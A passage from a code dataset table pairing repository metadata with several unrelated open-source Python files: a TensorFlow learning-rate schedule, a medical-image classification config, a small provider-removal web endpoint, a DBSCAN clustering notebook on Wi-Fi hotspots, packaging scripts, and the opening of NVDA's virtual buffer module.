hexsha
stringlengths 40
40
| size
int64 10
805k
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
176
| max_stars_repo_name
stringlengths 7
114
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
176
| max_issues_repo_name
stringlengths 7
114
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
48.5k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
176
| max_forks_repo_name
stringlengths 7
114
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 10
805k
| avg_line_length
float64 5.53
11k
| max_line_length
int64 10
129k
| alphanum_fraction
float64 0.13
0.93
| content_no_comment
stringlengths 0
449k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f718f388fa6452f78b2f19f1d9e3388c395d791d
| 3,742
|
py
|
Python
|
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
""" Helpers for training """
from math import pi
import tensorflow as tf
def piecewise_constant(global_step, *args, **kwargs):
    """ Piecewise-constant learning rate decay.

    Thin wrapper over ``tf.train.piecewise_constant`` whose first positional
    argument is explicitly the global training step (rather than a generic x).
    All remaining arguments are forwarded unchanged.
    """
    decay = tf.train.piecewise_constant
    return decay(global_step, *args, **kwargs)
def cyclic_learning_rate(learning_rate, global_step, max_lr, step_size=10,
                         mode='tri', name='CyclicLearningRate'):
    """ Vary the learning rate cyclically between `learning_rate` and `max_lr`.

    Returns the decayed learning rate for the given step.

    Parameters
    ----------
    learning_rate : float or tf.Tensor
        The minimum learning rate boundary.
    global_step : int or tf.Tensor
        Number of batches seen by the model; drives the cyclic computation.
        Must not be negative.
    max_lr : float or tf.Tensor
        The maximum learning rate boundary.
    step_size : int or tf.Tensor
        The number of iterations in half a cycle (the default is 10).
    mode : {'tri', 'sin', 'saw'}
        Shape of the learning-rate curve:

        - 'tri' (default): triangular wave — linearly increasing then linearly
          decreasing within each cycle, starting from
          (max_lr - learning_rate) / 2. See `Leslie N. Smith, Cyclical Learning
          Rates for Training Neural Networks <https://arxiv.org/abs/1506.01186>`_.
          Computed as::

              abs(mod((global_step + step_size / 4) / step_size, 1) - 0.5)
                  * 2 * (max_lr - learning_rate) + learning_rate

        - 'sin': sine wave, starting from (max_lr - learning_rate) / 2.
          Computed as::

              (learning_rate - max_lr) / 2 * sin(pi * global_step / step_size)
                  + (max_lr + learning_rate) / 2

        - 'saw': sawtooth — linearly increasing from `learning_rate` to
          `max_lr`, then dropping sharply at the end of each cycle.
          Computed as::

              (max_lr - learning_rate) * mod(global_step / step_size, 1)
                  + learning_rate
    name : str
        Name of the operation (the default is 'CyclicLearningRate').

    Returns
    -------
    tf.Tensor

    Raises
    ------
    ValueError
        If `mode` is not one of 'tri', 'sin' or 'saw'.
    """
    with tf.name_scope(name):
        learning_rate = tf.cast(learning_rate, dtype=tf.float32)
        global_step = tf.cast(global_step, dtype=tf.float32)
        step_size = tf.cast(step_size, dtype=tf.float32)
        max_lr = tf.cast(max_lr, dtype=tf.float32)

        if mode == 'tri':
            periodic_comp = tf.mod((global_step + step_size / 4) / step_size, 1)
            first_factor = tf.abs(periodic_comp - 0.5)
            second_factor = 2 * (max_lr - learning_rate)
            second_comp = learning_rate
        elif mode == 'sin':
            first_factor = (learning_rate - max_lr) / 2.
            second_factor = tf.sin((pi * global_step) / step_size)
            second_comp = (learning_rate + max_lr) / 2.
        elif mode == 'saw':
            first_factor = max_lr - learning_rate
            second_factor = tf.mod(global_step / step_size, 1)
            second_comp = learning_rate
        else:
            # Previously an unsupported mode fell through to the return below
            # and crashed with an obscure UnboundLocalError; fail fast with a
            # clear message instead.
            raise ValueError(
                "mode must be one of 'tri', 'sin' or 'saw', got %r" % (mode,))
        return first_factor * second_factor + second_comp
| 38.979167
| 98
| 0.610369
|
from math import pi
import tensorflow as tf
def piecewise_constant(global_step, *args, **kwargs):
return tf.train.piecewise_constant(global_step, *args, **kwargs)
def cyclic_learning_rate(learning_rate, global_step, max_lr, step_size=10,
mode='tri', name='CyclicLearningRate'):
with tf.name_scope(name):
learning_rate = tf.cast(learning_rate, dtype=tf.float32)
global_step = tf.cast(global_step, dtype=tf.float32)
step_size = tf.cast(step_size, dtype=tf.float32)
max_lr = tf.cast(max_lr, dtype=tf.float32)
if mode == 'tri':
periodic_comp = tf.mod((global_step + step_size / 4) / step_size, 1)
first_factor = tf.abs(periodic_comp - 0.5)
second_factor = 2 * (max_lr - learning_rate)
second_comp = learning_rate
elif mode == 'sin':
first_factor = (learning_rate - max_lr) / 2.
second_factor = tf.sin((pi * global_step) / step_size)
second_comp = (learning_rate + max_lr) / 2.
elif mode == 'saw':
first_factor = max_lr - learning_rate
second_factor = tf.mod(global_step / step_size, 1)
second_comp = learning_rate
return first_factor * second_factor + second_comp
| true
| true
|
f718f3acb3c506bde2a21041343d064a7d260045
| 556
|
py
|
Python
|
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | 1
|
2022-01-14T09:04:30.000Z
|
2022-01-14T09:04:30.000Z
|
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | null | null | null |
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED BY NBDEV! DO NOT EDIT!
__all__ = ["index", "modules", "custom_doc_links", "git_url"]
index = {"Scorer": "00_core.ipynb",
"TiebreakScorer": "00_core.ipynb",
"MatchTiebreakScorer": "00_core.ipynb",
"GamePointScorer": "00_core.ipynb",
"SetTracker": "00_core.ipynb",
"MatchTracker": "00_core.ipynb"}
modules = ["core.py"]
doc_url = "https://talksportsdata.github.io/tennisscorer/"
git_url = "https://github.com/talksportsdata/tennisscorer/tree/master/"
def custom_doc_links(name): return None
| 29.263158
| 71
| 0.670863
|
__all__ = ["index", "modules", "custom_doc_links", "git_url"]
index = {"Scorer": "00_core.ipynb",
"TiebreakScorer": "00_core.ipynb",
"MatchTiebreakScorer": "00_core.ipynb",
"GamePointScorer": "00_core.ipynb",
"SetTracker": "00_core.ipynb",
"MatchTracker": "00_core.ipynb"}
modules = ["core.py"]
doc_url = "https://talksportsdata.github.io/tennisscorer/"
git_url = "https://github.com/talksportsdata/tennisscorer/tree/master/"
def custom_doc_links(name): return None
| true
| true
|
f718f4de3b5790aa8494fefb772d4ffabc4a7a81
| 1,506
|
py
|
Python
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 5
|
2016-08-01T23:25:18.000Z
|
2019-06-02T00:10:32.000Z
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 120
|
2016-08-02T02:00:31.000Z
|
2017-11-01T02:38:11.000Z
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 15
|
2016-08-01T23:26:00.000Z
|
2019-11-09T13:17:54.000Z
|
from ..helpers import get_allowed
import os
import web
class RemoveProviderR:
    """
    This endpoint allows for removing a provider such as openstack or vmware.
    A Vent machine runs on a provider, this will not remove existing Vent
    machines on the specified provider. Note that a provider can only be
    removed from localhost of the machine running vcontrol unless the
    environment variable VCONTROL_OPEN=true is set on the server.
    """
    allow_origin, rest_url = get_allowed.get_allowed()

    def GET(self, provider):
        """Remove *provider* from providers.txt and report the outcome as a string."""
        try:
            web.header('Access-Control-Allow-Origin', self.allow_origin)
        except Exception as e:
            # BUG FIX: Python 3 exceptions have no ``.message`` attribute, so the
            # old ``print(e.message)`` raised AttributeError inside this handler.
            print(e)
        open_d = os.environ.get('VCONTROL_OPEN')
        providers_file_path = os.path.join(os.path.dirname(__file__), 'providers.txt')
        if web.ctx.env["HTTP_HOST"] == 'localhost:8080' or open_d == "true":
            # Read all provider lines, then rewrite the file without the target
            # entry. ``with`` guarantees the handles close even on error.
            with open(providers_file_path, "r") as f:
                lines = f.readlines()
            flag = 0
            with open(providers_file_path, 'w') as f:
                for line in lines:
                    if not line.startswith(provider + ":"):
                        f.write(line)
                    else:
                        flag = 1
            if flag:
                return "removed " + provider
            else:
                return provider + " not found, couldn't remove"
        else:
            return "must be done from the localhost running vcontrol daemon"
| 38.615385
| 86
| 0.592297
|
from ..helpers import get_allowed
import os
import web
class RemoveProviderR:
allow_origin, rest_url = get_allowed.get_allowed()
def GET(self, provider):
try:
web.header('Access-Control-Allow-Origin', self.allow_origin)
except Exception as e:
print(e.message)
open_d = os.environ.get('VCONTROL_OPEN')
providers_file_path = os.path.join(os.path.dirname(__file__), 'providers.txt')
if web.ctx.env["HTTP_HOST"] == 'localhost:8080' or open_d == "true":
f = open(providers_file_path,"r")
lines = f.readlines()
f.close()
flag = 0
with open(providers_file_path, 'w') as f:
for line in lines:
if not line.startswith(provider+":"):
f.write(line)
else:
flag = 1
if flag:
return "removed " + provider
else:
return provider + " not found, couldn't remove"
else:
return "must be done from the localhost running vcontrol daemon"
| true
| true
|
f718f4ded7275d8e31c1b545e38431a629a433de
| 3,781
|
py
|
Python
|
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
# dataset settings
dataset_type = 'Hie_Dataset'
# img_norm_cfg = dict(
#     mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)

# Training-time preprocessing: load a NIfTI volume, normalize intensities,
# resize to a fixed 3D shape, stack modalities, and pack tensors + label.
# NOTE(review): the 'instensity_*' spelling presumably matches the keyword
# names expected by the NormalizeMedical transform — confirm before renaming.
train_pipeline = [
    dict(type='LoadImageFromNIIFile'),
    dict(type='ExtractDataFromObj'),
    dict(type='NormalizeMedical', norm_type='full_volume_mean',
         instensity_min_val=0.5,
         instensity_max_val=99.5),
    dict(type='ResizeMedical', size=(160, 160, 80)),
    # dict(type='Normalize', **img_norm_cfg),
    dict(type='ConcatImage'),
    # dict(type='ImageToTensor', keys=['img']),
    dict(type='ToTensor', keys=['gt_label', 'img']),
    dict(type='Collect', keys=['img', 'gt_label'])
]
# Inference-time preprocessing: same steps but no label is collected.
test_pipeline = [
    dict(type='LoadImageFromNIIFile'),
    dict(type='ExtractDataFromObj'),
    dict(type='NormalizeMedical', norm_type='full_volume_mean',
         instensity_min_val=0.5,
         instensity_max_val=99.5),
    dict(type='ResizeMedical', size=(160, 160, 80)),
    dict(type='ToTensor', keys=['img']),
    dict(type='Collect', keys=['img'])
]
# Dataset splits. Note val and test point at the same annotation file.
data = dict(
    samples_per_gpu=8,
    workers_per_gpu=8,
    train=dict(
        type=dataset_type,
        data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
                    'hie_resample_0.5x0.5x0.5_niigz',
        ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_train.txt',
        pipeline=train_pipeline,
        modes=['t1_zw']),
    val=dict(
        type=dataset_type,
        data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
                    'hie_resample_0.5x0.5x0.5_niigz',
        ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
        pipeline=test_pipeline,
        modes=['t1_zw']),
    test=dict(
        # replace `data/val` with `data/test` for standard test
        type=dataset_type,
        data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
                    'hie_resample_0.5x0.5x0.5_niigz',
        ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
        pipeline=test_pipeline,
        modes=['t1_zw']))
# Evaluate every 2 epochs with the listed classification metrics.
evaluation = dict(interval=2, metric=['accuracy', 'precision', 'recall', 'f1_score', 'support'])

# 3D (volumetric) norm/conv layer types threaded into the backbone below.
norm_cfg = dict(type='BN3d', requires_grad=True)
conv_cfg = dict(type='Conv3d')
num_classes = 2
# model settings: ResNetV1d-34 backbone operating on 3D single-channel input,
# global average pooling neck, linear classification head.
model = dict(
    type='ImageClassifier',
    backbone=dict(
        type='ResNetV1d',
        depth=34,
        in_channels=1,
        in_dims=3,
        num_stages=4,
        out_indices=(3, ),
        style='pytorch',
        norm_cfg=norm_cfg,
        conv_cfg=conv_cfg,
        init_cfg=[
            dict(type='Kaiming', layer=['Conv3d']),
            dict(
                type='Constant',
                val=1,
                layer=['_BatchNorm', 'GroupNorm', 'BN3d'])
        ]
    ),
    neck=dict(type='GlobalAveragePooling', dim=3),
    head=dict(
        type='LinearClsHead',
        num_classes=num_classes,
        in_channels=512,
        loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
        topk=(1,),
    ))
# Optimization: SGD with step decay at epochs 40/80/120 over 160 epochs.
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(policy='step', step=[40, 80, 120])
runner = dict(type='EpochBasedRunner', max_epochs=160)
log_config = dict(
    interval=10,
    hooks=[
        dict(type='TextLoggerHook'),
        # dict(type='TensorboardLoggerHook')
    ])
# yapf:enable
# Checkpoint every 2 epochs; distributed training over NCCL.
checkpoint_config = dict(by_epoch=True, interval=2)
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
| 34.688073
| 102
| 0.612536
|
dataset_type = 'Hie_Dataset'
train_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
dict(type='ConcatImage'),
dict(type='ToTensor', keys=['gt_label', 'img']),
dict(type='Collect', keys=['img', 'gt_label'])
]
test_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
dict(type='ToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
]
data = dict(
samples_per_gpu=8,
workers_per_gpu=8,
train=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_train.txt',
pipeline=train_pipeline,
modes=['t1_zw']),
val=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']),
test=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']))
evaluation = dict(interval=2, metric=['accuracy', 'precision', 'recall', 'f1_score', 'support'])
norm_cfg = dict(type='BN3d', requires_grad=True)
conv_cfg = dict(type='Conv3d')
num_classes = 2
model = dict(
type='ImageClassifier',
backbone=dict(
type='ResNetV1d',
depth=34,
in_channels=1,
in_dims=3,
num_stages=4,
out_indices=(3, ),
style='pytorch',
norm_cfg=norm_cfg,
conv_cfg=conv_cfg,
init_cfg=[
dict(type='Kaiming', layer=['Conv3d']),
dict(
type='Constant',
val=1,
layer=['_BatchNorm', 'GroupNorm', 'BN3d'])
]
),
neck=dict(type='GlobalAveragePooling', dim=3),
head=dict(
type='LinearClsHead',
num_classes=num_classes,
in_channels=512,
loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
topk=(1,),
))
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(policy='step', step=[40, 80, 120])
runner = dict(type='EpochBasedRunner', max_epochs=160)
log_config = dict(
interval=10,
hooks=[
dict(type='TextLoggerHook'),
])
checkpoint_config = dict(by_epoch=True, interval=2)
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
| true
| true
|
f718f5aea68f8f5d6c62ecc3b4f133324fe5e627
| 1,000
|
py
|
Python
|
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | null | null | null |
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | 1
|
2021-02-12T10:57:00.000Z
|
2021-02-12T10:57:00.000Z
|
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | 1
|
2021-02-10T19:51:48.000Z
|
2021-02-10T19:51:48.000Z
|
import setuptools

# Use the README as the long description rendered on PyPI.
# BUG FIX: read it explicitly as UTF-8 — without `encoding`, open() falls back
# to the locale's preferred encoding and can fail on non-ASCII README content
# (e.g. on Windows with a cp125x locale).
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="note-python",
    version="1.3.0",
    author="Blues Inc.",
    author_email="support@blues.com",
    description="Cross-platform Python Library for the Blues Wireless Notecard,",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/blues/note-python",
    packages=setuptools.find_packages(),
    license="MIT",
    classifiers=[
        "Programming Language :: Python",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Intended Audience :: Developers",
        "Natural Language :: English",
    ],
    install_requires=["filelock"],
    python_requires='>=3.5',
)
| 33.333333
| 81
| 0.638
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="note-python",
version="1.3.0",
author="Blues Inc.",
author_email="support@blues.com",
description="Cross-platform Python Library for the Blues Wireless Notecard,",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/blues/note-python",
packages=setuptools.find_packages(),
license="MIT",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Natural Language :: English",
],
install_requires=["filelock"],
python_requires='>=3.5',
)
| true
| true
|
f718f67accd3c8664e57d618ee604d999d66ea44
| 1,424
|
py
|
Python
|
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | 1
|
2021-05-09T11:02:35.000Z
|
2021-05-09T11:02:35.000Z
|
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | null | null | null |
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | 1
|
2020-05-26T15:35:40.000Z
|
2020-05-26T15:35:40.000Z
|
# Init Solution
# Notebook-exported script: the `%matplotlib inline` magic below only works
# when this is executed under IPython/Jupyter, not as a plain Python script.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
from IPython.display import display, Markdown
# Init Solution completed
from sklearn.cluster import DBSCAN
from sklearn.base import clone

# Load the Wi-Fi hotspot data set and show the first rows as a sanity check.
display(Markdown("###### Loading Wi-Fi Data"))
data = pd.read_csv("./Ex14_Clust-01_Data.csv")
display(data.head(5))

# Scatter all hotspots by coordinate to get an overview before clustering.
display(Markdown("###### NYC Plot"))
fig, ax = plt.subplots(figsize=(20,20))
data.plot.scatter("Longitude", "Latitude", ax=ax, c="b")
fig.suptitle("Wi-Fi Hotspots in NYC")
plt.show()
display(Markdown("###### Clustering"))
def clustering(data, model, metric, ax):
    """Fit a copy of *model* on *data* with the given distance *metric* and
    draw the result on *ax*.

    Points the estimator labels -1 are treated as outliers and drawn in
    semi-transparent black; all remaining points are coloured by cluster label.
    The original *model* is left untouched (a clone is fitted).
    """
    estimator = clone(model)
    estimator.set_params(metric=metric)
    labels = estimator.fit_predict(data)
    n_cluster = len(np.unique(labels))
    is_outlier = labels == -1
    outliers = data[is_outlier]
    clustered = data[~is_outlier]
    cluster_labels = labels[~is_outlier]
    outliers.plot.scatter("Longitude", "Latitude", ax=ax, c="k", alpha=.5)
    clustered.plot.scatter("Longitude", "Latitude", ax=ax, c=cluster_labels, cmap="rainbow", colorbar=False)
    ax.set(title=f"Found {n_cluster} clusters with distance metric {metric}")
# Run DBSCAN on the raw coordinates (eps is in coordinate units, i.e. degrees)
# with two distance metrics side by side for comparison.
model = DBSCAN(eps=.005)
data_coord = data[["Longitude", "Latitude"]]
fig, ax = plt.subplots(1,2,figsize=(20,10))
clustering(data_coord, model, "euclidean", ax[0])
clustering(data_coord, model, "manhattan", ax[1])
fig.suptitle("Wi-Fi Clusters in NYC")
| 31.644444
| 110
| 0.707163
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
from IPython.display import display, Markdown
from sklearn.cluster import DBSCAN
from sklearn.base import clone
display(Markdown("###### Loading Wi-Fi Data"))
data = pd.read_csv("./Ex14_Clust-01_Data.csv")
display(data.head(5))
display(Markdown("###### NYC Plot"))
fig, ax = plt.subplots(figsize=(20,20))
data.plot.scatter("Longitude", "Latitude", ax=ax, c="b")
fig.suptitle("Wi-Fi Hotspots in NYC")
plt.show()
display(Markdown("###### Clustering"))
def clustering(data, model, metric, ax):
m = clone(model)
m.set_params(metric=metric)
l_pred = m.fit_predict(data)
n_cluster = len(np.unique(l_pred))
data_cluster = data[l_pred != -1]
label_cluster = l_pred[l_pred != -1]
data_outlier = data[l_pred == -1]
data_outlier.plot.scatter("Longitude", "Latitude", ax=ax, c="k", alpha=.5)
data_cluster.plot.scatter("Longitude", "Latitude", ax=ax, c=label_cluster, cmap="rainbow", colorbar=False)
ax.set(title=f"Found {n_cluster} clusters with distance metric {metric}")
model = DBSCAN(eps=.005)
data_coord = data[["Longitude", "Latitude"]]
fig, ax = plt.subplots(1,2,figsize=(20,10))
clustering(data_coord, model, "euclidean", ax[0])
clustering(data_coord, model, "manhattan", ax[1])
fig.suptitle("Wi-Fi Clusters in NYC")
| false
| true
|
f718f6c4067656037123e38cebf5af9768e2732f
| 28,363
|
py
|
Python
|
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | 6
|
2021-03-08T07:28:08.000Z
|
2022-02-23T02:48:23.000Z
|
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | null | null | null |
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | 2
|
2021-07-16T00:25:27.000Z
|
2022-03-24T08:36:36.000Z
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
# Direction constants for virtual-buffer find operations.
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
# ctypes type of a remote virtual-buffer node handle (64-bit unsigned).
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): r"\\:",
ord(u";"): r"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
# A lambda that coerces a value to a string and escapes characters suitable for a regular expression.
escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(name)
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
    """A quick-navigation item (heading, link, etc.) backed by a control field
    node in a virtual buffer."""

    def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
        """
        :param itemType: the quick-nav item type string (e.g. "heading").
        :param document: the virtual buffer the item lives in.
        :param vbufNode: handle of the item's control field node.
        :param startOffset: start offset of the node's text in the buffer.
        :param endOffset: end offset of the node's text in the buffer.
        """
        textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
        super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
        docHandle=ctypes.c_int()
        ID=ctypes.c_int()
        # Resolve the node handle to its (docHandle, ID) control identifier.
        NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
        self.vbufFieldIdentifier=(docHandle.value,ID.value)
        self.vbufNode=vbufNode

    @property
    def obj(self):
        # The NVDAObject corresponding to this item's control identifier.
        return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)

    @property
    def label(self):
        attrs = {}
        def propertyGetter(prop):
            if not attrs:
                # Lazily fetch the attributes the first time they're needed.
                # We do this because we don't want to do this if they're not needed at all.
                attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
            return attrs.get(prop)
        return self._getLabelForProperties(propertyGetter)

    def isChild(self,parent):
        # Headings nest by numeric level: a larger "level" attribute means a
        # deeper (child) heading; missing/invalid levels mean "not a child".
        if self.itemType == "heading":
            try:
                if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
